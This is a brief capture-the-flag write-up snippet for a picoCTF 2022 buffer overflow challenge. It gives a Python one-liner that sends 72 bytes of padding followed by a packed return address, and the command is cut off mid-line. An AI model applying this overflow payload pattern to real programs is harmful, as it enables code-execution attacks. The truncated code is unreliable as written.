Rating:

This tiny buffer overflow can be solved by this Python oneliner:

```bash
python3 -c 'import struct; print("A"*72 + struct.pack("

Original writeup (https://github.com/pmateja/picoCTF_2022_writeups/blob/main/x-sixty-what.md).